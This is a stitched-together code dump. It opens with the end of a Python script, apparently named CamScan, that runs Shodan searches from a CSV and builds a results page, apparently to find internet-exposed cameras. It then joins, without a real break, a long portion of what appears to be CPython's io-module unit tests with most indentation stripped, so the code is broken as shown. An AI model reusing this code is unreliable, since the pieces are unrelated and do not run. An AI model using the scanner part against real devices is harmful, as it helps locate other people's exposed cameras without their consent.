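# are needed for this to do anything useful.
if __name__ == '__main__':
    scanner = CamScan(timeout=7, verbose=True)
    if scanner.api is None:
        scanner.initShodan('YOUR_SHODAN_API_KEY')   # placeholder key
    scanner.chooseFromCSV('searches.csv')           # placeholder CSV path
    scanner.setPages('1')   # free accounts: stay on page 1
    scanner.run()
    scanner.generatePage(open_on_completion=True)
    for line in scanner.stats()[:3]:
        print(line)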
|
test_io.py
|
"""Unit tests for the io module."""
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io
import _pyio as pyio
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array('b', bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast('B')[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, 'r', encoding='latin-1') as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0
def tell(self):
return 0
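    # readinto() serves data from the scripted read stack: a None entry means
    # "no data available right now" (simulating non-blocking I/O), and an
    # oversized entry is split so the remainder stays queued for later reads.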
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b''
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation('not seekable')
def tell(self, *args):
raise self.UnsupportedOperation('not seekable')
def truncate(self, *args):
raise self.UnsupportedOperation('not seekable')
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b''.join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
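    # write() mimics a non-blocking raw stream: once block_on() has armed a
    # blocker character, a write containing it accepts only the bytes before
    # that character and returns their count, or, when the blocker is the very
    # first byte, clears it and returns None to signal "would block".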
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
self._write_stack.append(b[:n])
return n
else:
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b'blah.'), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b'blah.'), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b'Hello.'), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b' world\n\n\n')
self.assertEqual(f.write(buffer), 9)
buffer[:] = b'*' * 9
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b'h'), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b'hello')
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b' worl')
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b'd\n')
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b'hello world\n')
self.assertEqual(f.read(1), b'')
self.assertEqual(f.readinto(byteslike(b'x')), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b'world')
self.assertEqual(f.read(0), b'')
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b' worl')
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b'hello world\n')
f.seek(6)
self.assertEqual(f.read(), b'world\n')
self.assertEqual(f.read(), b'')
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b'hello')
LARGE = 2 ** 31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest('no largefile support')
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b'xxx'), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b'x')
def test_invalid_operations(self):
exc = self.UnsupportedOperation
for mode in ('w', 'wb'):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, 'wb', buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, 'rb', buffering=0) as fp:
self.assertRaises(exc, fp.write, b'blah')
self.assertRaises(exc, fp.writelines, [b'blah\n'])
with self.open(support.TESTFN, 'rb') as fp:
self.assertRaises(exc, fp.write, b'blah')
self.assertRaises(exc, fp.writelines, [b'blah\n'])
with self.open(support.TESTFN, 'r') as fp:
self.assertRaises(exc, fp.write, 'blah')
self.assertRaises(exc, fp.writelines, ['blah\n'])
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
def pipe_reader():
[r, w] = os.pipe()
os.close(w)
return self.FileIO(r, 'r')
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, 'w')
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
            return self.BufferedRWPair(self.MockUnseekableIO(),
                                       self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), 'ascii')
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), 'ascii')
        tests = ((pipe_reader, 'fr'), (pipe_writer, 'fw'),
                 (buffered_reader, 'r'), (buffered_writer, 'w'),
                 (buffered_random, 'rws'), (buffered_rw_pair, 'rw'),
                 (text_reader, 'r'), (text_writer, 'w'),
                 (self.BytesIO, 'rws'), (self.StringIO, 'rws'))
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue
with self.subTest(test), test() as obj:
readable = 'r' in abilities
self.assertEqual(obj.readable(), readable)
writable = 'w' in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = '3'
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b'3'
else:
self.fail('Unknown base class')
if 'f' in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith('win') and test in (pipe_reader,
pipe_writer):
continue
seekable = 's' in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\x00bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, 'wb', buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, 'rb', buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, 'wb') as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'abc\ndef\nxyzzy\nfoo\x00bar\nanother line')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.readline(), b'abc\n')
self.assertEqual(f.readline(10), b'def\n')
self.assertEqual(f.readline(2), b'xy')
self.assertEqual(f.readline(4), b'zzy\n')
self.assertEqual(f.readline(), b'foo\x00bar\n')
self.assertEqual(f.readline(None), b'another line')
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, 'r') as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b'hello world\n')
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires('largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, 'w+b', 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, 'w+b') as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, 'wb', bufsize) as f:
f.write(b'xxx')
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, 'wb', bufsize) as f:
1 / 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
def test_append_mode_tell(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'xxx')
with self.open(support.TESTFN, 'ab', buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, 'ab') as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, 'a') as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, 'wb')
f.write(b'xxx')
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'xxx')
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'xxx')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'xxx')
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, 'w'))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, 'w') as f:
f.write('egg\n')
with self.open(support.TESTFN, 'r') as f:
file = self.open(f.fileno(), 'r', closefd=False)
self.assertEqual(file.read(), 'egg\n')
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'r',
closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'egg\n')
with self.open(support.TESTFN, 'r') as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), 'r', closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, 'wb')
f.write(b'abcxxx')
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'abcxxx')
def test_unbounded_file(self):
zero = '/dev/zero'
if not os.path.exists(zero):
self.skipTest('{0} does not exist'.format(zero))
if sys.maxsize > 2147483647:
self.skipTest('test can only run in a 32-bit address space')
if support.real_max_memuse < support._2G:
self.skipTest('test requires at least 2GB of memory')
with self.open(zero, 'rb', buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, 'rb') as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, 'r') as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close)
self.assertTrue(f.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
f.flush = lambda : None
def test_flush_error_on_close(self):
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, 'wb', buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
rawio = self.MockRawIOWithoutRead((b'abc', b'd', None, b'efg', None))
self.assertEqual(rawio.read(2), b'ab')
self.assertEqual(rawio.read(2), b'c')
self.assertEqual(rawio.read(2), b'd')
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b'ef')
self.assertEqual(rawio.read(2), b'g')
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b'')
def test_types_have_dict(self):
test = self.IOBase(), self.RawIOBase(), self.TextIOBase(
), self.StringIO(), self.BytesIO()
for obj in test:
self.assertTrue(hasattr(obj, '__dict__'))
def test_opener(self):
with self.open(support.TESTFN, 'w') as f:
f.write('egg\n')
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open('non-existent', 'r', opener=opener) as f:
self.assertEqual(f.read(), 'egg\n')
def test_bad_opener_negative_1(self):
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
with self.open(__file__, 'rb') as f1, self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
class Stream(self.BufferedIOBase):
def read(self, size):
return b'12345'
read1 = read
stream = Stream()
for method in ('readinto', 'readinto1'):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b'12345')
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, 'w') as f:
f.write('egg\n')
with self.open(path, 'r') as f:
self.assertEqual(f.read(), 'egg\n')
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
class MyIO(self.IOBase):
def close(self):
pass
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg=
'Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg=
'C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output('stderr') as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith('Exception OSError: '), s)
self.assertTrue(s.endswith(' ignored'), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = '%s.%s' % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), '<%s>' % clsname)
raw.name = 'dummy'
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b'dummy'
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b)
except RuntimeError:
pass
def test_flush_error_on_close(self):
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close)
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
self.assertFalse(closed[1])
raw.flush = lambda : None
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err:
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err:
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b'A' * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = 'rb'
def test_constructor(self):
rawio = self.MockRawIO([b'abc'])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b'abc', bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b'abc'])
bufio.__init__(rawio)
self.assertEqual(b'abc', bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read(arg))
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'a', bufio.read(1))
self.assertEqual(b'b', bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b'c', bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b'd', bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b'efg', bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b'', bufio.read1(100))
self.assertEqual(rawio._reads, 4)
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'cd')
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ef')
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b'gf')
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b'gf')
rawio = self.MockRawIO((b'abc', None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b'cb')
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b'abc', b'de', b'fgh', b'jkl'))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b'c')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b'de')
self.assertEqual(rawio._reads, 2)
b = bytearray(2 * buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b'fghjkl')
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
